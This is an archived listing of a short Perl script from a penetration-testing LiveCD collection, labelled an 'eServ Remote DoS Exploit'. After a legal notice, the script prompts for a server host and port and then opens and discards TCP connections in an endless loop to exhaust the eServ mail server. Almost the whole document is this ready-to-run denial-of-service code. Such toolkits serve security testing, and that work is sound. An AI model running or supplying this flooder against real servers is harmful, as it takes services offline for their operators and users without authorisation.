home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / EServ / eserv-dos.pl < prev   
Perl Script  |  2005-02-12  |  646b  |  18 lines

  1. #!/usr/bin/perl
  2. #LEGAL NOTICE: Don't test this on networks you don't administer,
  3. #and do not test this tool on networks you don't own without
  4. #permission of the network owner.  You are responsible for all
  5. #damage due to your use of this tool.
  6. use IO::Socket;
  7. print "$0: eServ Remote DoS Exploit\r\n";
  8. print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
  9. print "Server hostname\: ";
  10. $host = trim(chomp($line = <STDIN>));
  11. print "Service port to probe\: ";
  12. $port = trim(chomp($line = <STDIN>));
  13. print "\r\nBeginning probe -- stop with CTRL+C\r\n";
  14. while (1) {
  15.  $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
  16.  undef $f;
  17. }
  18.